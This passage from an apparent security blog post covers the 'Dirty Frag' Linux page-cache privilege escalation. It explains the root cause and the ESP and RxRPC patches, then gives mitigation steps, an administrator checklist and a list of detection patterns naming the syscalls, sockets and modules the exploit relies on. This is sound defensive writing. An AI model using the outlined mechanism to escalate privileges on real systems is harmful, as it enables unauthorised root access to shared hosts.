The vulnerability appears when these assumptions meet. A file-backed page that should be read-only to the attacker travels through zero-copy paths into a network packet fragment. Later, crypto code treats that fragment as a private mutable buffer. The missing boundary check is: “Is this fragment backed by externally shared or file-cache memory that must not be modified in place?”

The ESP patch addresses this by marking shared fragments with SKBFL_SHARED_FRAG and forcing ESP input to avoid the fast skip_cow path when such fragments are present. In other words, the kernel must copy before writing.

For RxRPC, the submitted patch described by the researcher adds skb->data_len checks so non-linear skbs are copied before in-place decrypt operations.

Mitigation and Defense

1. Apply vendor kernel updates immediately

The permanent fix is a kernel update from your Linux distribution. Because Dirty Frag was disclosed during an embargo break, public write-ups initially appeared before all distributions had shipped fixes. Administrators should track vendor advisories for Ubuntu, Red Hat, SUSE, Fedora, AlmaLinux, CentOS Stream, Debian, Amazon Linux, and any custom kernel providers.

2. Disable vulnerable modules where possible

The Dirty Frag repository suggests temporarily preventing the loading of esp4, esp6, and rxrpc, unloading them if already loaded, and dropping page cache afterward. This is a mitigation, not a substitute for patching. It may break IPsec, RxRPC, AFS-related functionality, or workloads that depend on these kernel modules.

Defensive hardening idea:

- blacklist or block esp4 / esp6 if IPsec ESP is not required
- blacklist or block rxrpc if RxRPC/AFS is not required
- remove loaded modules only after validating production impact
- reboot or drop caches after suspected exploitation or testing

3. Restrict unprivileged user namespaces

The ESP variant needs a way to obtain CAP_NET_ADMIN in a new namespace. Restricting unprivileged user namespaces can reduce exposure to that path. However, this is not a complete fix because the RxRPC variant was specifically designed to work without unshare() in environments where rxrpc.ko is available.

4. Reduce local attack surface

Because Dirty Frag is local privilege escalation, defense should focus on limiting who can execute code locally:

- remove unnecessary shell access
- isolate hosting users
- harden CI/CD runners
- restrict writable web roots
- separate application users
- use container profiles with seccomp/AppArmor/SELinux
- avoid privileged containers

5. Monitor suspicious kernel feature use

Detection is difficult because successful exploitation modifies memory, not necessarily disk. Still, defenders can look for suspicious combinations:

- unexpected use of splice/vmsplice by untrusted processes
- unprivileged attempts to create AF_RXRPC sockets
- unusual add_key("rxrpc", ...) activity
- unexpected AF_ALG crypto socket usage
- sudden loading of rxrpc, esp4, or esp6 modules
- unprivileged namespace creation followed by XFRM netlink operations
- execution anomalies involving /usr/bin/su

eBPF, auditd, SELinux audit logs, AppArmor logs, and EDR telemetry may help, but none should be treated as a replacement for patching.

6. Clear page cache or reboot after suspected exploitation

The Dirty Frag repository warns that running the exploit contaminates page cache and recommends dropping caches or rebooting afterward. In a real incident, a reboot may be cleaner, but administrators should preserve forensic evidence first if compromise is suspected.

Practical Administrator Checklist

[ ] Identify kernel versions across all Linux hosts.
[ ] Check whether esp4, esp6, or rxrpc modules are present or loaded.
[ ] Check whether unprivileged user namespaces are enabled.
[ ] Review vendor advisories and install patched kernels.
[ ] Reboot into the fixed kernel after update.
[ ] Temporarily block vulnerable modules if business-safe.
[ ] Monitor for suspicious use of splice, AF_RXRPC, AF_ALG, and XFRM.
[ ] Treat shared multi-user systems as high priority.
[ ] Treat internet-facing systems with any local code execution path as high priority.
[ ] Reassess container hosts, CI runners, build machines, and hosting panels.

Conclusion

Dirty Frag is important because it shows that page-cache corruption is not a one-off Linux kernel mistake. Dirty Pipe, Copy Fail, and now Dirty Frag all point to the same dangerous pattern: performance optimizations that move pages across subsystems without making ownership and mutability explicit enough.

The technical lesson is simple but painful: if a kernel subsystem performs in-place writes, it must be absolutely certain that the destination memory is private and writable. In Dirty Frag, that guarantee was broken across networking, zero-copy I/O, and crypto paths. The result is a reliable local privilege escalation class affecting major Linux distributions.

For defenders, the priority is straightforward: patch kernels, reboot into fixed versions, temporarily disable exposed modules where possible, restrict local execution paths, and do not rely solely on disk integrity checks to detect page-cache attacks.

core-jmp

Dirty Frag: A New Linux Page-Cache Privilege Escalation Class